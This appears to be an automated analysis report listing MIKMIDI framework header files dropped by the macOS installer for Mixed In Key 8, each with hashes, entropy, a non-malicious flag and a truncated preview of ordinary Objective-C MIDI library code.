                                                                                                    MD5:90E90E99CA0DBC377FE042592CE93305
                                                                                                    SHA1:823D4ABD38B2F2707A03C0768C0FB2514A6A1018
                                                                                                    SHA-256:7CD97C4AE5742EB5C1A85490980578A32D3899987FFA994A274847E4F4B882CF
                                                                                                    SHA-512:3DCA5A82855B39131C3621E04445DEE80F56034687B073F9A0B3F8202FF8F4FC725F7CB23223DB59BD0F95FB03ECA20C1B36EB6671A02E9247348D4686D8D16B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDINoteOffCommand.h.// MIDI Testbed.//.// Created by Andrew Madsen on 6/2/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDINoteCommand.h"..NS_ASSUME_NONNULL_BEGIN../**. * A MIDI note off message.. */.@interface MIKMIDINoteOffCommand : MIKMIDINoteCommand../**. * Convenience method for creating a note off command.. *. * @param note The note number for the command. Must be between 0 and 127.. * @param velocity The velocity for the command. Must be between 0 and 127.. * @param channel The channel for the command. Must be between 0 and 15.. * @param timestamp The timestamp for the command. Pass nil to use the current date/time.. *. * @return An initialized MIKMIDINoteOffCommand instance.. */.+ (instancetype)noteOffCommandWithNote:(NSUInteger)note........ velocity:(NSUInteger)velocity........ channel:(UInt8)channel........ timestamp:(nullable NSDate *)timestamp;../**. * Convenience method for creating a note off command.. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_5XSmMd
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1039
                                                                                                    Entropy (8bit):5.075158198176606
                                                                                                    Encrypted:false
                                                                                                    MD5:0AAD3109A74F51B02B0B0CA3750F91C9
                                                                                                    SHA1:645CE129C2A5D078433EE12C20BF9099AE767B4F
                                                                                                    SHA-256:74CBADB34AD7B9B143EC8AEB4D6EDD0C6EB1C44D35B60E3A9CDE9D7E59718016
                                                                                                    SHA-512:BA443AE29236698921469CCF8B87198A523FAD11E8EEE30816CEF37AA985FA836997D1038375B477E0B0F2BC217D696D574930BDD9A32A75AA1D1B53D0E6EA85
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIMetronome.h.// MIKMIDI.//.// Created by Chris Flesner on 11/24/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIEndpointSynthesizer.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. *.This class is only a subclass of MIKMIDIEndpointSynthesizer so it continues to function with MIKMIDIPlayer while. *.it still exists. Once MIKMIDIPlayer is removed from the code base, expect this to become a subclass of MIKMIDISynthesizer.. */.@interface MIKMIDIMetronome : MIKMIDIEndpointSynthesizer..- (nullable instancetype)init;.// makes -init available to subclass in Swift while we're still a subclass of MIKMIDIEndpointSynthesizer..@property (nonatomic) MIDINoteMessage tickMessage;.@property (nonatomic) MIDINoteMessage tockMessage;..@end...@interface MIKMIDIMetronome (Private)../**. * This should not be called directly, but may be overridden by subclasses to setup the metronome instrument. *.in a custom manner.. */.- (BOOL)setupM
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_6nTdHL
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1042
                                                                                                    Entropy (8bit):5.11368378091881
                                                                                                    Encrypted:false
                                                                                                    MD5:AFF05A304F4027AC9F3EA2B8682E80E5
                                                                                                    SHA1:46CCA28912774967CCFD21367165AEDDF4DEC9D0
                                                                                                    SHA-256:DEF3814B5E79729BF36853A83FDBAF1C856580BA664C28FEC5111DE6A380CB2C
                                                                                                    SHA-512:1EDCC67420327AAB829B7945404F7314FD59492E541E390D0D3E6C25DF067F49626CB15178D340FF69834A97E507EA85BFCE1641726AC26332412DE6B2E94E49
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIMetaTrackSequenceNameEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaTextEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * A meta event containing a track name.. */.@interface MIKMIDIMetaTrackSequenceNameEvent : MIKMIDIMetaTextEvent..- (instancetype)initWithName:(NSString *)name timeStamp:(MusicTimeStamp)timeStamp;..@property (nonatomic, readonly, nullable) NSString *name;..@end../**. * The mutable counterpart of MIKMIDIMetaTrackSequenceNameEvent. */.@interface MIKMutableMIDIMetaTrackSequenceNameEvent : MIKMIDIMetaTrackSequenceNameEvent..@property (nonatomic, copy, readwrite, nullable) NSString *name;..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, readwrite) UInt8 metadataType;.@property (nonatomic, strong, readwrite, null_resettable) NSData *metaData;.@property (nonatomic, copy, readwrite) NSSt
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_6pw77U
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1305
                                                                                                    Entropy (8bit):5.180786767437297
                                                                                                    Encrypted:false
                                                                                                    MD5:F9F618536C1501D279668614E0DA8F69
                                                                                                    SHA1:2ACD5787AFBED530CD3B81B0E70F49AE3941BFB2
                                                                                                    SHA-256:83C1645E67FE53B76FE53B4AA0765A793A8780BEBAEFB27ABC75805CCE52CDC2
                                                                                                    SHA-512:5C6FF8B16B7EC2D43B6374A4A675A6573DA26B34B5FE369DD40E118EA1122F56BFC7BEE07933BC02F6447445B357932DFF4F2BF0D099168C52853B0B9D29A8A9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIInputPort.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/8/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIPort.h".#import "MIKMIDISourceEndpoint.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIEndpoint;.@class MIKMIDICommand;..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDIInputPort is an Objective-C wrapper for CoreMIDI's MIDIPort class, and is only for source ports.. * It is not intended for use by clients/users of of MIKMIDI. Rather, it should be thought of as an. * MIKMIDI private class.. */.@interface MIKMIDIInputPort : MIKMIDIPort..- (id _Nullable)connectToSource:(MIKMIDISourceEndpoint *)source....... error:(NSError **)error..... eventHandler:(MIKMIDIEventHandlerBlock)eventHandler;.- (void)disconnectConnectionForToken:(id)token;..@property (nonatomic, strong, readonly) MIKArrayOf(MIKMIDIEndpoint *) *connectedSources;..@property (nonatomic) BOOL coalesces14BitControlChangeCommands; // Default is YES../**. * Time be
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_7gnC9B
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):2749
                                                                                                    Entropy (8bit):4.9771302647808175
                                                                                                    Encrypted:false
                                                                                                    MD5:58E720EB3B5634C67F205B440726B718
                                                                                                    SHA1:554D0D1BD9FEEC320CCDDE5B714CE49F3B75B8DD
                                                                                                    SHA-256:DB95EA3DFADAAF2CB5C5E1C4FB12E3F53FF9FC7F5535886FEB43689C8C443910
                                                                                                    SHA-512:DDF79B58ACB6455F20045F07B798473369580BD7BF435FB9237C53F2E9CC83CBC3AD3E2B312CD57CA03CFEA1EC0B0534049A439DA898B2A060542459C8879D31
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDINoteCommand.h.// MIKMIDI.//.// Created by Andrew R Madsen on 9/18/17..// Copyright .. 2017 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelVoiceCommand.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * A MIDI note on message.. */.@interface MIKMIDINoteCommand : MIKMIDIChannelVoiceCommand../**. * Convenience method for creating a note on command.. *. * @param note The note number for the command. Must be between 0 and 127.. * @param velocity The velocity for the command. Must be between 0 and 127.. * @param channel The channel for the command. Must be between 0 and 15.. * @param isNoteOn YES if the command should be a note on command, NO if it should be a note off command.. * @param timestamp The timestamp for the command. Pass nil to use the current date/time.. *. * @return An initialized MIKMIDINoteCommand instance.. */.+ (instancetype)noteCommandWithNote:(NSUInteger)note....... velocity:(NSUInteger)velocity.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_9Xk61H
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1687
                                                                                                    Entropy (8bit):5.016018925441187
                                                                                                    Encrypted:false
                                                                                                    MD5:A03F402D1747A1122F83C4B17BE9EF71
                                                                                                    SHA1:6F4A917BEA46831A32A0105FB6E93DC6FC4681D3
                                                                                                    SHA-256:2D6BC8B56F17FE30FE85AF0253F44824EB77505201B29D13472C4256020CFBF6
                                                                                                    SHA-512:BBDC4A4C209F969E5EC5B64A726E237D422EE1D8E7C909972A3D23148816340018CC77B721E1816974FEC4E214809881B3C30C8A96A065BD955A12B67C40666B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIChannelVoiceCommand.h.// MIDI Testbed.//.// Created by Andrew Madsen on 6/2/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDICommand.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDIChannelVoiceCommand is used to represent MIDI messages whose type is. * any of the channel voice command subtypes. Specific support for channel voice command. * subtypes is provided by subclasses of MIKMIDIChannelVoiceCommand (e.g.. * MIKMIDIControlChangeCommand, MIKMIDINoteOnCommand, etc.). */.@interface MIKMIDIChannelVoiceCommand : MIKMIDICommand../**. * The MIDI channel the message was or should be sent on. Valid. * values are from 0-15.. */.@property (nonatomic, readonly) UInt8 channel;../**. * The value of the command. The meaning of this property is. * different for different subtypes. For example, for a control change command,. * this is the controllerValue. For a note on command, this is the. * velocity.. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_A7yF28
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):2794
                                                                                                    Entropy (8bit):4.901660501536985
                                                                                                    Encrypted:false
                                                                                                    MD5:3139950DEEC057B9474813405C53A1EB
                                                                                                    SHA1:B3F1055B0AA0467F6F21D21AEA54B5AF396A91D6
                                                                                                    SHA-256:AD8D64D43DA6BC3C6708F8578B16CA2429D6B6BE3A769EB4544CCB2F4924052C
                                                                                                    SHA-512:A37C6F196111F3ACB8A79A1A0F3338D71555FAEC0142F7104C17C29F7A2FC828C780F25C28CCC5C5D942C1D785B8315934352721ECBF1F9A334A8B183D94D777
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIResponder.h.// Energetic.//.// Created by Andrew Madsen on 3/11/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDICommand;..NS_ASSUME_NONNULL_BEGIN../**. * The MIKMIDIResponder protocol defines methods to be implemented by any object that wishes. * to receive MIDI messages/commands.. *. * Any class in an application can implement this protocol. To actually receive MIDI messages,. * a responder object must be registered by calling -[NS/UIApplication registerMIDIResponder].. * Additionally, it is the client application's responsibility to pass incoming MIDI messages to. * the application instance by calling -[NS/UIApplication handleMIDICommand:]. */..@protocol MIKMIDIResponder <NSObject>..@required./**. * Returns an NSString used to uniquely identify this MIDI responder. Need not be . * human readable, but it should be unique in the application.. *. * This id
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_B4slGq
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1164
                                                                                                    Entropy (8bit):5.15243202482787
                                                                                                    Encrypted:false
                                                                                                    MD5:5B2FBDEEF039908BF6B9F4E2F0FDD069
                                                                                                    SHA1:FC97E4DFA4A8A2183F05F1265DFCD8CDC4E8C148
                                                                                                    SHA-256:F7C28883CF18FB8B89B2C470458A89E3BC7ED2728A3A82137033D73F8746893A
                                                                                                    SHA-512:DCBB356CEEAA91EFF021FD6A33FFC7A202143B7C367DD02C5A1FC5D5C72C0F73ABF6F010E12DB720B41084E96858F41CCEE62B2328D7020BEEECCB90C4907F6E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIPitchBendChangeEvent.h.// MIKMIDI.//.// Created by Andrew Madsen on 3/4/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * A pitch bed change event.. *. * This event indicates a pitch bend change. On devices, pitch. * bends are usually generated using a wheel or lever.. */.@interface MIKMIDIPitchBendChangeEvent : MIKMIDIChannelEvent../**. * A 14-bit value indicating the pitch bend.. * Center is 0x2000 (8192). . * Valid range is from 0-16383.. */.@property (nonatomic, readonly) UInt16 pitchChange;..@end../**. * The mutable counterpart of MIKMIDIPitchBendChangeEvent.. */.@interface MIKMutableMIDIPitchBendChangeEvent : MIKMIDIPitchBendChangeEvent..@property (nonatomic, readonly) UInt16 pitchChange;..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, strong, readwrite, null_resettable) NSMutableData *data;.@property (n
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_BCvDfc
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):751
                                                                                                    Entropy (8bit):5.0979009304204155
                                                                                                    Encrypted:false
                                                                                                    MD5:B461DB006073A1025084E4E6709ED3CE
                                                                                                    SHA1:0B8123AB06A2874C560BDB4FB4ABEEFD5F59DCCF
                                                                                                    SHA-256:3751871312CC3A6F29FD798941AFB324617E9415BFA5E0548E1299232B245E57
                                                                                                    SHA-512:9D8CE75CB82E1BAABBF2E55543B4371EF626592AC03A89648B96388A88067200396CCC0EEBDA7677E288F6667A138E661EA381D52FA79C5B6AFFD5F19FE8D896
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIMetadataSequenceEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * A meta event containing sequence information.. */.@interface MIKMIDIMetaSequenceEvent : MIKMIDIMetaEvent..@end../**. * The mutable counterpart of MIKMIDIMetaSequenceEvent.. */.@interface MIKMutableMIDIMetaSequenceEvent : MIKMIDIMetaSequenceEvent..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, readwrite) MIKMIDIMetaEventType metadataType;.@property (nonatomic, strong, readwrite, null_resettable) NSData *metaData;..@end..NS_ASSUME_NONNULL_END
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_BRkIMn
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):583
                                                                                                    Entropy (8bit):5.2325377323386855
                                                                                                    Encrypted:false
                                                                                                    MD5:E55BDB6A74ED29367EA4B08402282755
                                                                                                    SHA1:02A524B227886284B060BBD697A084B3C482BFD5
                                                                                                    SHA-256:D26E90AF35BD9ECD55588BCFB18341F9B31D01002F8AF46E25E7875E2F782C3F
                                                                                                    SHA-512:1E388158CA233FBC9EE80CB52913AD71D130FF355EB52BDDD39565A69AF0ED159F112F8320E23AAA7C07E6C70BD2F10E4E9F802DFBFAE5D5D3CDA5BE7355274D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDICommandScheduler.h.// MIKMIDI.//.// Created by Chris Flesner on 7/3/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDICommand;..NS_ASSUME_NONNULL_BEGIN../**. *.Objects that conform to this protocol can be used as a destination for MIDI commands to. *.be sent to by MIKMIDISequencer.. *. *.@see MIKMIDISequencer. */.@protocol MIKMIDICommandScheduler <NSObject>..- (void)scheduleMIDICommands:(MIKArrayOf(MIKMIDICommand *) *)commands;..@end..NS_ASSUME_NONNULL_END.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_CazMpF
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):756
                                                                                                    Entropy (8bit):5.113568844719289
                                                                                                    Encrypted:false
                                                                                                    MD5:8ABF9BF30CE0783905EEC0FD72A97D07
                                                                                                    SHA1:3C4D93A8A01E95314B1078033A50D9CAAF90B7A2
                                                                                                    SHA-256:9CAA49B80D686AE33A7033A6EF68FFBE98B01CFEB71743557C693F49A07136D6
                                                                                                    SHA-512:FB229AD4E4727B4F480C317043003AD05B9C9B4C0781A0C0DD7CA5B9004C0F9F996BE75109D0292F42456B9B31EF703C70A179FF7405593ECAD9CE1830ABB8CD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIMetaCuePointEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIMetaTextEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * A meta event containing cue point information.. */.@interface MIKMIDIMetaCuePointEvent : MIKMIDIMetaTextEvent..@end../**. * The mutable counterpart of MIKMIDIMetaCuePointEvent.. */.@interface MIKMutableMIDIMetaCuePointEvent : MIKMIDIMetaCuePointEvent..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, readwrite) MIKMIDIMetaEventType metadataType;.@property (nonatomic, strong, readwrite, null_resettable) NSData *metaData;..@end..NS_ASSUME_NONNULL_END
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Cc4SYU
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):2669
                                                                                                    Entropy (8bit):4.944861168209807
                                                                                                    Encrypted:false
                                                                                                    MD5:9D330C12E874DF25E555BCEA43C2D90C
                                                                                                    SHA1:A1006704B634BA30C4D5E30EF234D957F18D63CD
                                                                                                    SHA-256:D51A053CCA5B9B676C8701B63A81838A796DBF609A1EB111F263ED3575796505
                                                                                                    SHA-512:105408A1797BCAFA14061CE76FC50257904B975C3C7B038DD49BCCC11B72B9F726B63DC6823D3C291BAA4C229BB0DF65E57316671B9FD16C0515A28A0F0AA8E0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIErrors.h.// Danceability.//.// Created by Andrew Madsen on 7/19/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * Error domain for errors generated by MIKMIDI.. */.extern NSString * const MIKMIDIErrorDomain;../**. * Error code values for NSError objects in the MIKMIDI error domain.. */.typedef NS_ENUM(NSInteger, MIKMIDIErrorCode) {../**.. * Unknown error... */..MIKMIDIUnknownErrorCode = 1,../**.. *.Invalid argument error... */..MIKMIDIInvalidArgumentError,../**.. * An error occurred because the connection to a device was lost... */..MIKMIDIDeviceConnectionLostErrorCode,../**.. * An connection error occurred because the device has no source endpoints... */..MIKMIDIDeviceHasNoSourcesErrorCode,../**.. * MIDI mapping using MIKMIDIMappingGenerator failed... */..MIKMIDIMappingFailedErrorCode,../**.. * The mapping file did not have the correct file
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_DWEdKu
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):8030
                                                                                                    Entropy (8bit):4.835477134697957
                                                                                                    Encrypted:false
                                                                                                    MD5:B874DF0BFA106DE18D2CBA842CB9E840
                                                                                                    SHA1:92E9220F4B6A0908264091B6AD3F0E1924FA32AB
                                                                                                    SHA-256:0491C597D7D27BAD33123D9AC0E2E42BC510E438E3A135A984E63FC555F912D0
                                                                                                    SHA-512:3DF2AFC5BC799F0538D4A4C16EA57D220ADABFCC525928CD44E5B1D21E0E565CA25AF3D867D07ADB3CBB1AA52B0C9E72EF43D570447AD94908B3DEF773EF7AF5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIMappingManager.h.// Danceability.//.// Created by Andrew Madsen on 7/18/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDICompilerCompatibility.h"..#define kMIKMIDIMappingFileExtension @"midimap"..@class MIKMIDIMapping;..@protocol MIKMIDIMappingManagerDelegate;..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDIMappingManager provides a centralized way to manage an application's. * MIDI mappings. It handles both bundled (built in) mapping files, as well. * as user-customized mappings. It will automatically load both bundled and. * user mappings from disk. It will also save user mappings to an appropriate. * location on disk, providing an easy to way to support the ability to import user. * mappings to an applicaation.. *. * MIKMIDIMappingManager is a singleton.. */.@interface MIKMIDIMappingManager : NSObject../**. * Used to obtain the shared MIKMIDIMappingManager instance.. * MIKMIDIMappingManager should no
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_ETSWYS
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):5246
                                                                                                    Entropy (8bit):4.903417392254864
                                                                                                    Encrypted:false
                                                                                                    MD5:404A65C3D8B1F97203986D2C108169C3
                                                                                                    SHA1:751FC1E25D1482DF359F79CEDD4BC2A11623CD66
                                                                                                    SHA-256:54DA6C371CA099FE4550FBB5C00C9F42949A4B6F055D9EB70E323DE7CCFADABF
                                                                                                    SHA-512:3328B54801352830AEE6069227AA61F7733E96B97541227A7BB459F4CD7379C0DD7AA171DCE592EA4E92EC4ABF61D876C413A483783FFC03AA0C55B210801A42
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDISynthesizer.h.// .//.// Created by Andrew Madsen on 2/19/15..//.//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDISynthesizerInstrument.h".#import "MIKMIDICommandScheduler.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDISynthesizer provides a simple way to synthesize MIDI messages to. * produce sound output.. *. * To use it, simply create a synthesizer instance, then pass MIDI messages. * to it by calling -handleMIDIMessages:.. *. * A subclass, MIKMIDIEndpointSynthesizer, adds the ability to easily connect. * to a MIDI endpoint and automatically synthesize incoming messages.. *. * @see MIKMIDIEndpointSynthesizer. *. */.@interface MIKMIDISynthesizer : NSObject <MIKMIDICommandScheduler>..#pragma clang diagnostic push.#pragma clang diagnostic ignored "-Wnullability" // See https://github.com/mixedinkey-opensource/MIKMIDI/issues/216./**. * Initializes an MIKMIDISynthesizer instance which u
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_EXEU77
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1579
                                                                                                    Entropy (8bit):4.983519165912661
                                                                                                    Encrypted:false
                                                                                                    MD5:F01ADF7F29B5BF586D7BA4912C16EE29
                                                                                                    SHA1:9EE8FBA51D9AE4EE60546099FAFDBDFCAB594FC0
                                                                                                    SHA-256:E2F5240EF47C6CD6BE16D641238AD08DD491FA335D1EF839167AD7971E2345A9
                                                                                                    SHA-512:04D3BA19DBF70A585DDC614592C01A3A4513CC79BE6969A6D30E85696C85A444214F2D7DC21AB9FE5C958F84C9FDF0FE395286B3E47E882A1C8601DF73D8C920
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDISourceEndpoint.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/8/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIEndpoint.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDISourceEndpoint;.@class MIKMIDICommand;..NS_ASSUME_NONNULL_BEGIN../**. * Block used by various MIKMIDI APIs that deliver incoming MIDI messages.. *. * @param source.The source endpoint from which MIDI messagse were received.. * @param commands.An NSArray containing received MIKMIDICommand instances.. */.typedef void(^MIKMIDIEventHandlerBlock)(MIKMIDISourceEndpoint *source, MIKArrayOf(MIKMIDICommand *) *commands); // commands in an array of MIKMIDICommands../**. * MIKMIDISourceEndpoint represents a source (input) MIDI endpoint.. * It is essentially an Objective-C wrapper for instances of CoreMIDI's MIDIEndpoint class. * which are kMIDIObjectType_Source type endpoints.. *. * MIDI source endpoints are contained by MIDI entities, which are in turn con
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_FNFYyD
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):10420
                                                                                                    Entropy (8bit):4.793016401496391
                                                                                                    Encrypted:false
                                                                                                    MD5:D98404A464625D0503622C76CB315989
                                                                                                    SHA1:EA7431D2753CFC0025B947B46B27B518D4AF6BD1
                                                                                                    SHA-256:FD554A0C1C12F9174FC82197F2DEF51BBC2CCB287724721600FE5959B39A3939
                                                                                                    SHA-512:983B8DCBF5637F6D8C5526A240882DB5808B9D2205649EC81B02CFDEF31A285EA4192AE439129DCE50677F8FB551C76E03C0CFE904A96F93147CE0AA713335FC
